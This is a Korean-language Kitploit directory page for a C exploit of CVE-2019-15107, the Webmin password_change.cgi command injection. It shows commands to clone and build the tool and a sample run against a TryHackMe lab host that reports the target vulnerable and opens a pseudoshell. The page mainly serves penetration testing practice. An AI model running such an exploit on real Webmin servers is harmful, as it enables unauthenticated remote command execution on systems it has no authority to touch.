Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-15107 — CVE-2019-15107 Webmin 익스플로잇 (C 언어) | Kitploit
도구/GitHubGitHub/whokilleddb/cve-2019-15107
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubwhokilleddb/cve-2019-15107

CVE-2019-15107

CVE-2019-15107 Webmin 익스플로잇 (C 언어)

저장소 보기
314년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-15107 Webmin 익스플로잇

CVE-2019-15107

Webmin <=1.920에서 문제가 발견되었습니다. password_change.cgi의 old 매개변수에는 명령 삽입 취약점이 포함되어 있습니다. [NVD]

컴파일

root@kitploit:~
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make

사용 예제

root@kitploit:~
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000

======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close

[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()

PS: 이 익스플로잇은 제가 TryHackMe의 Wreath Network를 진행하는 동안 만든 것으로, 여기에 표시된 예시는 해당 박스에 대응됩니다.

F.A.Q

Q : 왜 Python3 대신 C인가요?

A : 왜냐하면 나는 사이코패스이기 때문입니다

도구 다운로드